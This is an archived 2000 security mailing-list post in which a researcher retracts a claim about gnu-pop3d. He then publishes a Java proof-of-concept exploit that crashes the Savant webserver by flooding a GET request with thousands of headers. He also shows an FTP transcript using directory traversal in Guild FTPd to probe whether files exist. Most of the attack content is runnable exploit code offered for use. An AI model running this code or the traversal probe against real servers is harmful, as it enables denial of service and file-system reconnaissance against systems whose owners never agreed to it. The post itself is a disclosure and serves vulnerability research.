Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:421
HistoryJul 10, 2000 - 12:00 a.m.

gnu-pop3d (FTGate problem), Savant Webserver, Guild FTPd

2000-07-1000:00:00
vulners.com
8
JSON

Yo,

Errr… Sorry about saying gnu-pop3d had the same problem as FTGate -
don't know how that got in my list - I assume from posting after a rather
hectic party and before that vital cup of coffee the next day. :)
Apologies, all.

Anyway, I found a stack overflow in the Savant webserver the other day -
lemmee just paste the code I wrote here…

/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant

  • Written by Wizdumb <[email protected] || www.mdma.za.net/fk>
  • The overflow occurs when the server recieves too many headers in the GET
  • request. The results of the attack look something like…
  • SAVANT caused an invalid page fault
  • in module KERNEL32.DLL at 015f:bff87eb5.
  • Registers:
  • EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
  • EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
  • ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
  • EDX=bff76859 ES=0167 EDI=010a020c GS=0000
  • Bytes at CS:EIP:
  • 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
  • Stack dump:
  • Enjoy!
  • Andrew Lewis aka. Wizdumb [03/07/2000]
    */

import java.io.;
import java.net.;

class savantstack {

public static void main(String[] args) throws IOException {

if (args.length != 1) {
System.out.println("Syntax: java savantstack [hostname/ip]");
System.exit(1); }

Socket soq = null;
PrintWriter white = null;

int i = 5000; // This should do fine :-)

soq = new Socket(args[0], 80);
white = new PrintWriter(soq.getOutputStream(), true);

System.out.print("Showing " + args[0] + " the phj33r :P …");
white.print("GET /index.html HTTP/1.0");
for (int x = 0; x < i; x++) white.println("A:A");
white.println("\n");
System.out.println("Done!");

white.close();
soq.close(); } }

That's it. I also found a more minor vulnerability in Guild FTPd -
although directory transversal with GET can't be used to d/l files outside
of the FTP root directory, it can be used to see if files exist. An
example follows…

C:\wizdumb>ftp localhost
Connected to kung-phusion.
220-GuildFTPD FTP Server (c) 1999
220-Version 0.93i
220 Please enter your name:
User (kung-phusion:(none)): test
331 User name okay, Need password.
Password:
230 User logged in.
ftp> cd …
550 Access denied.
ftp> get …/nonexistant.txt
200 PORT command successful.
550 Access denied.
ftp> get …/autoexec.bat
200 PORT command successful.
150 Opening ascii mode data connection for \…/autoexec.bat (1143 bytes).
425 Download failed.
ftp> quit
221 Goodbye. Control connection closed.

The SIZE command can also be used in a similar manner.

Anyway, I'm outta here again…

Cheers,
Andrew Lewis aka. Wizdumb [MDMA]

[email protected]
www.mdma.za.net/fk

JSON